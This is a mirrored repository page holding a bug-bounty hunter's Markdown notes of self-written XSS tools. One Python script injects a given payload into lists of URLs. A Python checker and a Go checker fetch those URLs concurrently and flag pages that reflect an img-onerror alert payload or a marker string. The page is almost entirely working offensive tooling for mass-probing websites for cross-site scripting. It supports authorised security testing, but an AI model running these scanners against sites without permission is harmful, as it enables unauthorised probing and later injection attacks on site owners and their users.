Mirrors/My-Methodologies
2
0
Fork 0
mirror of https://github.com/xalgord/My-Methodologies.git synced 2024-11-10 06:04:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
My-Methodologies/scripts-written-by-me-for-xss.md

284 lines
7.6 KiB
Markdown
Raw Permalink Normal View History

GITBOOK-37: change request with no subject merged in GitBook
2023-07-03 10:22:49 +00:00
# 📜 Scripts written by me for XSS
GITBOOK-24: change request with no subject merged in GitBook
2023-06-25 08:29:02 +00:00
## XSS Combiner
GITBOOK-36: change request with no subject merged in GitBook
2023-07-03 10:22:08 +00:00
```python
GITBOOK-24: change request with no subject merged in GitBook
2023-06-25 08:29:02 +00:00
import sys
def combine_urls_with_payload(xss_payload, urls):
combined_urls = []
for url in urls:
if "FUZZ" in url:
combined_url = url.replace("FUZZ", "") + xss_payload
else:
if "?=" in url:
combined_url = url.replace("?=", "?" + xss_payload + "&")
else:
combined_url = url + "?" + xss_payload
combined_urls.append(combined_url)
return combined_urls
def main():
# Check if the XSS payload is provided as a command line argument
if len(sys.argv) < 2:
print("Error: XSS payload is missing.", file=sys.stderr)
print("Usage: python script.py <xss_payload>", file=sys.stderr)
sys.exit(1)
# Read the XSS payload from the command line argument
xss_payload = sys.argv[1]
# Read URLs from stdin (piped input)
urls = [url.strip() for url in sys.stdin]
# Combine each URL with the XSS payload, removing the "FUZZ" keyword if present
combined_urls = combine_urls_with_payload(xss_payload, urls)
# Print the combined URLs
for combined_url in combined_urls:
print(combined_url)
if __name__ == "__main__":
main()
```
## XSS Checker
GITBOOK-36: change request with no subject merged in GitBook
2023-07-03 10:22:08 +00:00
```python
GITBOOK-24: change request with no subject merged in GitBook
2023-06-25 08:29:02 +00:00
import sys
import os
import asyncio
import aiohttp
from bs4 import BeautifulSoup
import argparse
from colorama import Fore, Style
from alive_progress import alive_bar
async def check_xss_payload(url, output_file, verbose):
try:
async with aiohttp.ClientSession() as session:
async with session.get(url, timeout=10) as response:
if response.status == 200:
html = await response.text()
soup = BeautifulSoup(html, 'html.parser')
if soup.find('img', {'src': 'x', 'onerror': 'alert(\'XSS\');'}):
if verbose:
print(f"{Fore.GREEN}XSS payload found in: {url}{Style.RESET_ALL}")
return url
except (aiohttp.ClientError, asyncio.TimeoutError):
pass
return None
async def process_url(url, output_file, verbose, counter):
result = await check_xss_payload(url, output_file, verbose)
if result:
if not verbose:
print(result, flush=True)
counter += 1 # Increment the counter
return result
async def process_urls(urls, num_threads, output_file, verbose):
xss_payloads_found = []
counter = 0 # Counter for tracking progress
with alive_bar(len(urls), bar='blocks', spinner='dots_waves2', enrich_print=False) as progress_bar:
semaphore = asyncio.Semaphore(num_threads)
async with semaphore:
tasks = []
for url in urls:
url = url.strip()
tasks.append(process_url(url, output_file, verbose, counter)) # Pass the counter
for task in asyncio.as_completed(tasks):
result = await task
if result:
xss_payloads_found.append(result)
progress_bar()
return xss_payloads_found
def check_xss_payloads_parallel(urls_file, num_threads, output_file=None, verbose=False):
if not os.path.isfile(urls_file):
print(f"{Fore.RED}Error: File '{urls_file}' does not exist.{Style.RESET_ALL}")
return
with open(urls_file, 'r') as file:
urls = file.readlines()
loop = asyncio.get_event_loop()
xss_payloads = loop.run_until_complete(process_urls(urls, num_threads, output_file, verbose))
print(f"\n{Fore.CYAN}-------- Summary --------{Style.RESET_ALL}")
print(f"{Fore.YELLOW}Total URLs: {len(urls)}")
print(f"XSS Payloads Found: {len(xss_payloads)}{Style.RESET_ALL}")
if verbose:
if len(xss_payloads) > 0:
print(f"\n{Fore.CYAN}URLs with XSS Payloads:{Style.RESET_ALL}")
for url in xss_payloads:
print(url)
def main():
parser = argparse.ArgumentParser(description='XSS Payload Checker')
parser.add_argument('urls_file', metavar='urls_file', type=str, help='Path to the file containing URLs')
parser.add_argument('--threads', type=int, default=10, help='Number of threads for parallel processing')
parser.add_argument('--output', type=str, help='Path to the output file to store URLs with XSS payloads')
parser.add_argument('--verbose', action='store_true', help='Enable verbose output')
args = parser.parse_args()
check_xss_payloads_parallel(args.urls_file, args.threads, args.output, args.verbose)
if __name__ == '__main__':
main()
```
GITBOOK-25: change request with no subject merged in GitBook
2023-06-27 05:55:07 +00:00
## Written in Go
```go
package main
import (
"bufio"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"sync"
)
type Result struct {
URL string
HasXSS bool
}
func checkXSSPayload(url string, outputFileName string, verbose bool, resultChan chan<- Result, wg *sync.WaitGroup) {
defer wg.Done()
resp, err := http.Get(url)
if err != nil {
resultChan <- Result{URL: url, HasXSS: false}
return
}
defer resp.Body.Close()
if resp.StatusCode == http.StatusOK {
html, err := ioutil.ReadAll(resp.Body)
if err != nil {
resultChan <- Result{URL: url, HasXSS: false}
return
}
if strings.Contains(string(html), "xalgord") {
if verbose {
fmt.Printf("\033[1;33mXSS payload found in:\033[0m \033[1;32m%s\033[0m\n", url)
}
if outputFileName != "" {
f, err := os.OpenFile(outputFileName, os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644)
if err != nil {
resultChan <- Result{URL: url, HasXSS: false}
return
}
defer f.Close()
if _, err := f.WriteString(url + "\n"); err != nil {
resultChan <- Result{URL: url, HasXSS: false}
return
}
}
resultChan <- Result{URL: url, HasXSS: true}
return
}
}
resultChan <- Result{URL: url, HasXSS: false}
}
func processURLs(urlsFile string, numThreads int, outputFileName string, verbose bool) {
file, err := os.Open(urlsFile)
if err != nil {
fmt.Printf("\033[1;31mError: Failed to open file '%s'.\033[0m\n", urlsFile)
return
}
defer file.Close()
scanner := bufio.NewScanner(file)
urls := make([]string, 0)
for scanner.Scan() {
urls = append(urls, strings.TrimSpace(scanner.Text()))
}
totalURLs := len(urls)
resultChan := make(chan Result, totalURLs)
var wg sync.WaitGroup
wg.Add(totalURLs)
fmt.Println("Checking URLs...")
for _, url := range urls {
go checkXSSPayload(url, outputFileName, verbose, resultChan, &wg)
}
wg.Wait()
close(resultChan)
xssPayloadsFound := make([]string, 0)
for result := range resultChan {
if result.HasXSS {
xssPayloadsFound = append(xssPayloadsFound, result.URL)
}
}
fmt.Println()
fmt.Printf("\033[1;33m-------- Summary --------\033[0m\n")
fmt.Printf("Total URLs: %d\n", totalURLs)
fmt.Printf("XSS Payloads Found: %d\n", len(xssPayloadsFound))
fmt.Printf("URLs with XSS Payloads: %d/%d\n", len(xssPayloadsFound), totalURLs)
if verbose && len(xssPayloadsFound) > 0 {
fmt.Printf("\033[1;33m-------- URLs with XSS Payloads --------\033[0m\n")
for _, url := range xssPayloadsFound {
fmt.Println(url)
}
}
}
func main() {
if len(os.Args) < 2 {
fmt.Println("Usage: reflectioner urls_file [num_threads] [output_file] [verbose]")
return
}
urlsFile := os.Args[1]
numThreads := 1
outputFile := ""
verbose := false
if len(os.Args) > 2 {
numThreads = parseThreads(os.Args[2])
}
if len(os.Args) > 3 {
outputFile = os.Args[3]
}
if len(os.Args) > 4 && os.Args[4] == "true" {
verbose = true
}
processURLs(urlsFile, numThreads, outputFile, verbose)
}
func parseThreads(input string) int {
threads := 1
_, err := fmt.Sscanf(input, "%d", &threads)
if err != nil {
threads = 1
}
return threads
}
```
Reference in a new issue Copy permalink